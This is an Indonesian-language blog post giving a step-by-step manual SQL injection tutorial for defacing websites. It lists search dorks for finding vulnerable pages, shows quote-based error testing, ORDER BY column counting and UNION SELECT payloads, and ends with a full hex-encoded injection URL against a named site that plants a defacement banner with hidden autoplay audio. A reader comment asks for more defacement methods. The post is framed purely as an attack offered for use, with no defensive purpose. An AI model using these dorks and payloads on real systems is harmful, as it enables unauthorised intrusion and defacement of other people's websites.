SQL INJECT
Assalamualaikum wr.wb
Oke di postingan kali ini saya akan memberikan tutorial SQL inject manual menggunakan android ,tapi ini SQL inject nya ngk nyari username sama pass website target ya ,hanya mencantumkan nama ,lagu dan foto saja .
Oke langsung saja ke tutorial nya
Dork :
- inurl:/detail_berita.php?id=
- inurl:/umum.php?id=
- inurl:/games.php?id=
- inurl:/about.php?id=
- inurl:/viewproduct.php?id=
Live target
- Kita dorking dulu dork di atas
2.setelah kita dapat target kita coba cek target apakah vuln dengan SQL inject dengan cara menambah kan ' di belakang nomor url web target contoh
http://www.jjhobby.com/viewproduct.php?id=9'
Bila vuln tampilan nya akan jadi seperti ini
Nah kira" gitu ,pokok nya ada eror my SQL apa eror SQL sytax ya gitu" deh
3.kalo web target vuln kita lanjut masuk kan exploit nya yaitu :
Tambahin +order+by+1--
+order+by+2--~~~~~~~~3--~~~~~~~~4--
Dan seterusnya
Sampai ketemu eror
Gw eror di angka 11 berarti jumlah colomn nya ada 10
Waalaikumsalam wr.wb
4.setalah kita tau jumlah colomn nya lanjut kita masukin exploit berikut nya yaitu
+union+select+1,2,3,4,5,6,7,8,9,10--
Angka yg di belakang itu sesuai jumlah colomn nya ya ,jangan lupa tambahi - di depan nomor id nya misal id=9 jadi id=-9
Dan hasil nya
Yang gw lingkarin itu adalah angka ajaib nya
5.saya pilih angka 2 ,lanjut kita inject angka /web nya
Kita kunjungi dulu web ini untuk hek code html nya Disini
Misal ini code html kalian:
<center><img class="rotate" src="https://4.top4top.net/p_129460x4i0.jpg" height="400px" width="400px"><br>INJECTED BY PcT•Mr.Pemula & My Teacher MR.CRUNCH<br><iframe width="0" height="0" src="https://5.top4top.net/m_13214tzi60.mp3" frameborder="0" allowfullscreen></iframe> <style type="text/css"> .rotate { animation-name: rotate ; animation-duration: 5s; animation-play-state: running; animation-timing-function: linear; animation-iteration-count: infinite; opacity: 1.0;filter: alpha(opacity=50); } img:hover { opacity: 1.0; filter: alpha(opacity=100); } @keyframes rotate{ 10% {transform:rotateY(36deg)} 20% {transform:rotateY(72deg)} 30% {transform:rotateY(108deg)} 40% {transform:rotateY(144deg)} 50% {transform:rotateY(180deg)} 60% {transform:rotateY(216deg)} 70% {transform:rotateY(252deg)} 80% {transform:rotateY(288deg)} 90% {transform:rotateY(324deg)} 100% {transform:rotateY(360deg)} } </style>
Nah lalu kalian copy code kalian itu dan paste di web di atas ,gini
Kemudian kalian klik tombol
Nah itu hasil nya
6.setelah itu ,kalian masuk in code inject nya :
+union+select+1,CONCAT(0xHASILHEXYGTADI),3,4,5,6,7,8,9,10--
Kata contact itu sesuai dengan colomn kalian yang tadi ,sesuai dengan angka ajaib nya . 0x itu harus di pake ya ,Jan di hapus
Nih hasil gw Di sini
Dan ini hasil akhir link nya :
http://www.jjhobby.com/viewproduct.php?id=-9+union+select+1,CONCAT(0x3C63656E7465723E3C696D6720636C6173733D22726F7461746522207372633D2268747470733A2F2F342E746F7034746F702E6E65742F705F313239343630783469302E6A706722206865696768743D223430307078222077696474683D223430307078223E3C62723E494E4A45435445442042592050635420224D722E50656D756C612026204D792054656163686572204D522E4352554E43483C62723E3C696672616D652077696474683D223022206865696768743D223022207372633D2268747470733A2F2F352E746F7034746F702E6E65742F6D5F3133323134747A6936302E6D7033220D0A6672616D65626F726465723D22302220616C6C6F7766756C6C73637265656E3E3C2F696672616D653E0D0A3C7374796C6520747970653D22746578742F637373223E0D0A2E726F74617465207B0D0A616E696D6174696F6E2D6E616D653A20726F74617465203B0D0A616E696D6174696F6E2D6475726174696F6E3A2035733B0D0A616E696D6174696F6E2D706C61792D73746174653A2072756E6E696E673B0D0A616E696D6174696F6E2D74696D696E672D66756E6374696F6E3A206C696E6561723B0D0A616E696D6174696F6E2D697465726174696F6E2D636F756E743A20696E66696E6974653B0D0A6F7061636974793A20312E303B66696C7465723A20616C706861286F7061636974793D3530293B0D0A7D0D0A696D673A686F766572207B0D0A6F7061636974793A20312E303B0D0A66696C7465723A20616C706861286F7061636974793D313030293B0D0A7D0D0A406B65796672616D657320726F746174657B0D0A313025207B7472616E73666F726D3A726F7461746559283336646567297D0D0A323025207B7472616E73666F726D3A726F7461746559283732646567297D0D0A333025207B7472616E73666F726D3A726F746174655928313038646567297D0D0A343025207B7472616E73666F726D3A726F746174655928313434646567297D0D0A353025207B7472616E73666F726D3A726F746174655928313830646567297D0D0A363025207B7472616E73666F726D3A726F746174655928323136646567297D0D0A373025207B7472616E73666F726D3A726F746174655928323532646567297D0D0A383025207B7472616E73666F726D3A726F746174655928323838646567297D0D0A393025207B7472616E73666F726D3A726F746174655928333234646567297D0D0A31303025207B7472616E73666F726D3A726F746174655928333630646567297D0D0A7D0D0A3C2F7374796C653E),3,4,5,6,7,8,9,10--
Dan hasil inject nya
Oke sekian dulu dari saya ,bila ada pertanyaan bisa coment di bawah atau hubungi Saya

Subscribe Our Newsletter
2 Responses to "SQL INJECT"
Next requests deface metode lokopedia😚
Great information. Thank you so much for sharing it with us. You can try this.xor decoder
Post a Comment